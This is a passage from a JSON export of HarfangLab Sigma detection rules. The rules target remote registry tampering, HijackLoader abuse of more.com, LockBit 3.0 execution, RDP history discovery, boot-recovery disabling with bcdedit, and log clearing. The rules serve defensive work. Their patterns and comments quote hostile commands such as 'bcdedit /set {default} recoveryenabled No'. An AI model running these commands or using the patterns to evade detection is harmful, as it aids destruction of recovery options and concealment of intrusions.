"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/",
"https://car.mitre.org/analytics/CAR-2014-11-005/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_remote_registry_disableidle.yml",
"content": "title: Remote Registry Service Configuration Modified\nid: 3b081a6b-6195-46fe-924f-a649c6059107\ndescription: |\n Detects when the configuration of the Remote Registry Service is modified.\n This service is by default, disabled on workstations (starting with Windows 8) and enabled on servers. It is also set, by default, to stop automatically if it idles for more than 10 minutes.\n An adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\n It can be used by an attacker to prepare a Lateral Movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving its objective.\n It is recommended to analyze the parent process to determine if this activity is normal in your infrastructure.\nreferences:\n - https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/\n - https://car.mitre.org/analytics/CAR-2014-11-005/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/09/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RemoteRegistry\\DisableIdleStop'\n\n filter_stop:\n Details: 'DWORD (0x00000001)' # It will stop after 10mins of idle\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - 
'?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3b081a6b-6195-46fe-924f-a649c6059107",
"rule_name": "Remote Registry Service Configuration Modified",
"rule_description": "Detects when the configuration of the Remote Registry Service is modified.\nThis service is by default, disabled on workstations (starting with Windows 8) and enabled on servers. It is also set, by default, to stop automatically if it idles for more than 10 minutes.\nAn adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\nIt can be used by an attacker to prepare a Lateral Movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving its objective.\nIt is recommended to analyze the parent process to determine if this activity is normal in your infrastructure.\n",
"rule_creation_date": "2023-09-13",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3b24630e-1690-4a29-8fb1-c841f646d79b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069782Z",
"creation_date": "2026-03-23T11:45:34.069784Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069788Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader",
"https://www.crowdstrike.com/blog/hijackloader-expands-techniques/",
"https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/",
"https://attack.mitre.org/techniques/T1055/012/"
],
"name": "t1055_012_supicious_execution_from_more_com.yml",
"content": "title: Suspicious Process Launched by more.com\nid: 3b24630e-1690-4a29-8fb1-c841f646d79b\ndescription: |\n Detects processes started by the more.com Windows utility.\n The more.com binary is not supposed to spawn any process, therefore this behavior is suspicious.\n This behavior was spotted in a HijackLoader sample, in a September 2024 campaign and was used to execute the final payload via process hollowing.\n It is recommended to investigate the spawned process to look for other suspicious actions.\nreferences:\n - https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader\n - https://www.crowdstrike.com/blog/hijackloader-expands-techniques/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1055/012/\ndate: 2024/09/19\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\more.com'\n\n exclusion_werfault:\n Image|endswith: '\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n OriginalFileName: 'WerFault.exe'\n Signed: 'true'\n\n exclusion_connhost:\n Image|endswith: '\\conhost.exe'\n CommandLine|contains: '\\conhost.exe 0xffffffff -Force'\n OriginalFileName: 'CONHOST.EXE'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3b24630e-1690-4a29-8fb1-c841f646d79b",
"rule_name": "Suspicious Process Launched by more.com",
"rule_description": "Detects processes started by the more.com Windows utility.\nThe more.com binary is not supposed to spawn any process, therefore this behavior is suspicious.\nThis behavior was spotted in a HijackLoader sample, in a September 2024 campaign and was used to execute the final payload via process hollowing.\nIt is recommended to investigate the spawned process to look for other suspicious actions.\n",
"rule_creation_date": "2024-09-19",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3b29a0f1-1ed0-42f2-a31e-f0496a442c96",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609613Z",
"creation_date": "2026-03-23T11:45:34.609617Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609624Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://laurentiu-raducu.medium.com/lockbit-3-0-ransomware-analysis-198b1d4b75a3",
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a",
"https://attack.mitre.org/techniques/T1486/"
],
"name": "t1486_ransomware_lockbit_v3_executed.yml",
"content": "title: LockBit 3.0 Ransomware Executed\nid: 3b29a0f1-1ed0-42f2-a31e-f0496a442c96\ndescription: |\n Detects a specific command-line related to the execution of the LockBit 3.0 ransomware.\n LockBit 3.0, also named LockBit Black, was released in March 2022.\n This new variant requires a password to unpack the original text section, a technique similar to the one employed by BlackCat.\n It is recommended to quickly isolate the target machine and to activate your incident response plan.\nreferences:\n - https://laurentiu-raducu.medium.com/lockbit-3-0-ransomware-analysis-198b1d4b75a3\n - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\n - https://attack.mitre.org/techniques/T1486/\ndate: 2024/05/22\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1480.001\n - attack.impact\n - attack.t1486\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Ransomware.LockBit\n - classification.Windows.Behavior.Encryption\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains: ' -k LocalServiceNetworkRestricted -pass '\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3b29a0f1-1ed0-42f2-a31e-f0496a442c96",
"rule_name": "LockBit 3.0 Ransomware Executed",
"rule_description": "Detects a specific command-line related to the execution of the LockBit 3.0 ransomware.\nLockBit 3.0, also named LockBit Black, was released in March 2022.\nThis new variant requires a password to unpack the original text section, a technique similar to the one employed by BlackCat.\nIt is recommended to quickly isolate the target machine and to activate your incident response plan.\n",
"rule_creation_date": "2024-05-22",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1480.001",
"attack.t1486"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3b3dd805-29d5-4f12-8de6-0e15e060d9ab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605991Z",
"creation_date": "2026-03-23T11:45:34.605995Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606003Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer",
"https://attack.mitre.org/techniques/T1021/001/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1021_001_rdp_history.yml",
"content": "title: RDP History Discovered via Registry\nid: 3b3dd805-29d5-4f12-8de6-0e15e060d9ab\ndescription: |\n Detects the query of a registry key containing the history of RDP sessions.\n This can be used by attackers to discover RDP-accessible computers from the currently infected host for future lateralization.\n It is recommended to investigate the parent process for other suspicious actions.\nreferences:\n - https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/02\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1021.001\n - attack.t1018\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Reg\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\reg.exe'\n - OriginalFileName: 'reg.exe'\n selection_cmd:\n CommandLine|contains|all:\n - ' query '\n - '\\Software\\Microsoft\\Terminal Server Client\\Default'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3b3dd805-29d5-4f12-8de6-0e15e060d9ab",
"rule_name": "RDP History Discovered via Registry",
"rule_description": "Detects the query of a registry key containing the history of RDP sessions.\nThis can be used by attackers to discover RDP-accessible computers from the currently infected host for future lateralization.\nIt is recommended to investigate the parent process for other suspicious actions.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1021.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3b65bce7-bd24-4c84-8667-bdb959aed034",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083035Z",
"creation_date": "2026-03-23T11:45:34.083037Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083041Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.delivr.to/analysis-of-an-agenttesla-pif-sample-ad3785ff1609",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_susp_pif_file_execution.yml",
"content": "title: Pif File Executed\nid: 3b65bce7-bd24-4c84-8667-bdb959aed034\ndescription: |\n Detects the execution of a pif (Program Information File) file, a type of file associated with older MS-DOS and Windows operating systems.\n These files were particularly useful during the era of Windows 3.x but are largely obsolete in modern versions of Windows and is often exploited by adversaries to mask their malicious binary.\n It is recommended to verify the legitimacy of the binary.\nreferences:\n - https://blog.delivr.to/analysis-of-an-agenttesla-pif-sample-ad3785ff1609\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2024/11/07\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessName|endswith: '.pif'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3b65bce7-bd24-4c84-8667-bdb959aed034",
"rule_name": "Pif File Executed",
"rule_description": "Detects the execution of a pif (Program Information File) file, a type of file associated with older MS-DOS and Windows operating systems.\nThese files were particularly useful during the era of Windows 3.x but are largely obsolete in modern versions of Windows and is often exploited by adversaries to mask their malicious binary.\nIt is recommended to verify the legitimacy of the binary.\n",
"rule_creation_date": "2024-11-07",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ba75314-ca70-44d1-9965-f04a78999361",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071298Z",
"creation_date": "2026-03-23T11:45:34.071302Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071307Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://micahbabinski.medium.com/catching-a-wev-tutil-threat-detection-for-the-rest-of-us-f692f01efcd4",
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_boot_configuration_modified.yml",
"content": "title: Boot Configuration Modified\nid: 3ba75314-ca70-44d1-9965-f04a78999361\ndescription: |\n Detects bcdedit.exe used to modify and/or delete critical boot configuration data.\n Attackers can modify the boot configuration to disrupt system recovery in the event of corruption.\n It is recommended to look for other malicious actions taken by the parent of bcdedit.exe and to investigate the execution context to determine the legitimacy of this action.\nreferences:\n - https://micahbabinski.medium.com/catching-a-wev-tutil-threat-detection-for-the-rest-of-us-f692f01efcd4\n - https://attack.mitre.org/techniques/T1490/\ndate: 2020/10/08\nmodified: 2025/04/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bcdedit:\n - Image|endswith: '\\bcdedit.exe'\n - OriginalFileName: 'bcdedit.exe'\n\n selection_set:\n CommandLine|contains: 'set '\n\n selection_recovery:\n # bcdedit /set {default} recoveryenabled No\n CommandLine|contains|all:\n - 'recoveryenabled'\n - 'no'\n\n selection_bootstatuspolicy_1:\n # bcdedit /set {default} bootstatuspolicy IgnoreAllFailures\n CommandLine|contains: 'bootstatuspolicy'\n\n selection_bootstatuspolicy_2:\n CommandLine|contains:\n - 'IgnoreAllFailures'\n - 'IgnoreShutdownFailures'\n - 'IgnoreCheckpointFailures'\n - 'IgnoreBootFailures'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - CurrentDirectory|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_uwfmgr:\n # https://learn.microsoft.com/en-us/windows-hardware/customize/enterprise/uwf-turnonuwf\n # command is also launched using WMI...\n ProcessGrandparentCommandLine:\n # uwfmgr 
filter enable / ?:\\windows\\system32\\uwfmgr.exe filter enable\n - '*uwfmgr* filter enable'\n - '?:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding'\n ProcessCommandLine: '?:\\Windows\\system32\\bcdedit.exe /set {bootloadersettings} BOOTSTATUSPOLICY IgnoreAllFailures'\n\n exclusion_deep_freeze:\n ProcessParentImage: '?:\\Windows\\Temp\\DeepFreeze_C.exe'\n\n exclusion_rufus:\n CommandLine: '?:\\windows\\system32\\bcdedit.exe /store ?:\\EFI\\Microsoft\\Boot\\BCD /set {default} recoveryenabled no'\n ParentImage|contains: 'rufus'\n\n condition: selection_bcdedit and selection_set and (selection_recovery or all of selection_bootstatuspolicy_*) and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ba75314-ca70-44d1-9965-f04a78999361",
"rule_name": "Boot Configuration Modified",
"rule_description": "Detects bcdedit.exe used to modify and/or delete critical boot configuration data.\nAttackers can modify the boot configuration to disrupt system recovery in the event of corruption.\nIt is recommended to look for other malicious actions taken by the parent of bcdedit.exe and to investigate the execution context to determine the legitimacy of this action.\n",
"rule_creation_date": "2020-10-08",
"rule_modified_date": "2025-04-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bac3ff7-b800-4f05-bd5f-a24cf8d1a898",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089901Z",
"creation_date": "2026-03-23T11:45:34.089903Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089908Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/",
"https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_chrome_extensions_load.yml",
"content": "title: Suspicious Extensions Loaded by Chrome-based Browser (Windows)\nid: 3bac3ff7-b800-4f05-bd5f-a24cf8d1a898\ndescription: |\n Detects a Chrome-based browser launched with a specific argument that permits to load extensions from a specific folder.\n Adversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\n It is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/\n - https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/09\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n CommandLine|re: '--load-extension=[^ ]'\n ProcessParentName: 'explorer.exe'\n\n filter_share:\n CommandLine|contains: '--load-extension=\\\\\\\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bac3ff7-b800-4f05-bd5f-a24cf8d1a898",
"rule_name": "Suspicious Extensions Loaded by Chrome-based Browser (Windows)",
"rule_description": "Detects a Chrome-based browser launched with a specific argument that permits to load extensions from a specific folder.\nAdversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\nIt is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bac97ee-c6e6-4ca8-b70f-42535dcd471c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093282Z",
"creation_date": "2026-03-23T11:45:34.093284Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093288Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/002/"
],
"name": "t1070_002_clear_logs_macos.yml",
"content": "title: Logs Cleared\nid: 3bac97ee-c6e6-4ca8-b70f-42535dcd471c\ndescription: |\n Detects system or user logs being cleared.\n Attackers may clear logs to hide evidence of an intrusion.\n It is recommended to investigate whether this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1070/002/\ndate: 2022/11/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Deletion\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_binary1:\n Image:\n - '/bin/rm'\n - '/bin/unlink'\n - '/bin/dd'\n - '/usr/bin/truncate'\n\n selection_binary2:\n Image:\n - '/bin/cat'\n - '/bin/echo'\n CommandLine|contains: \">\"\n\n selection_log:\n CommandLine|contains:\n - '/var/log'\n # Catch /Library/Logs/ and /Users/user/Library/Logs/\n - '/Library/Logs/'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n # process\n - '/osascript'\n\n exclusion_eset:\n CommandLine|startswith: 'rm -rf /Library/Logs/Eset/'\n CurrentDirectory: '/private/var/folders/zz/*'\n\n exclusion_zoom:\n CommandLine: 'rm -f /Library/Logs/zoomusinstall.log'\n CurrentDirectory: '/private/tmp/PKInstallSandbox.*'\n\n exclusion_microsoft:\n CommandLine:\n - '/bin/rm -rf /var/log/com.microsoft.mdatp'\n - '/bin/rm -f /var/log/microsoft_defender_err.log'\n - '/bin/rm -f /var/log/microsoft_defender.log'\n - '/bin/rm -f /var/log/microsoft_defender_telemetryd.log'\n - '/bin/rm -f /var/log/microsoft_defender_telemetryd_err.log'\n - '/bin/rm -f /var/log/fresno\\*.log'\n\n exclusion_nx1:\n CommandLine:\n - '/bin/bash /applications/nomachine.app/contents/frameworks/scripts/setup/nxnode --install'\n - '/bin/bash 
/applications/nomachine.app/contents/frameworks/scripts/setup/nxserver --install'\n - '/bin/bash /applications/nomachine.app/contents/frameworks/scripts/setup/nxplayer --install'\n - '/bin/bash /applications/nomachine.app/contents/frameworks/scripts/setup/nxrunner --install'\n\n exclusion_nx2:\n CommandLine|contains|all:\n - '/bin/echo NX> 700'\n - '/Library/Application Support/NoMachine/var/log'\n\n exclusion_commandline:\n CommandLine:\n - 'rm /var/log/dsijamf//UR1_applications.log'\n - 'rm -f /Applications/MAMP/Library/logs/fastcgi/nginxFastCGI.sock'\n - 'rm -f /Applications/MAMP/Library/logs/nginxFastCGI.pid'\n - 'rm -rf /Library/Logs/DiagnosticReports/Retired/macOS InstantView\\*.ips'\n - 'rm -rf /Library/Logs/DiagnosticReports/macOS InstantView\\*.crash'\n - 'rm -rf /Library/Logs/DiagnosticReports/macOS InstantView\\*.ips'\n - 'rm -rf /Users/*/Library/Logs/DiagnosticReports/Retired/macOS InstantView\\*.ips'\n - 'rm -rf /Users/*/Library/Logs/DiagnosticReports/macOS InstantView\\*.crash'\n - 'rm -rf /Users/*/Library/Logs/DiagnosticReports/macOS InstantView\\*.ips'\n - 'rm -rf /var/log/fctinstallpost.log'\n - 'rm -f /Library/Logs/VMware/VMware Horizon Client/vmware-view-usb-service.log'\n - 'rm -rf /Users/gaetan/Library/Logs/Eset/RemoteAdministrator/EraAgentInstaller.log'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/'\n\n condition: 1 of selection_binary* and selection_log and selection_susp_ancestors and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bac97ee-c6e6-4ca8-b70f-42535dcd471c",
"rule_name": "Logs Cleared",
"rule_description": "Detects system or user logs being cleared.\nAttackers may clear logs to hide evidence of an intrusion.\nIt is recommended to investigate whether this action was legitimate.\n",
"rule_creation_date": "2022-11-23",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
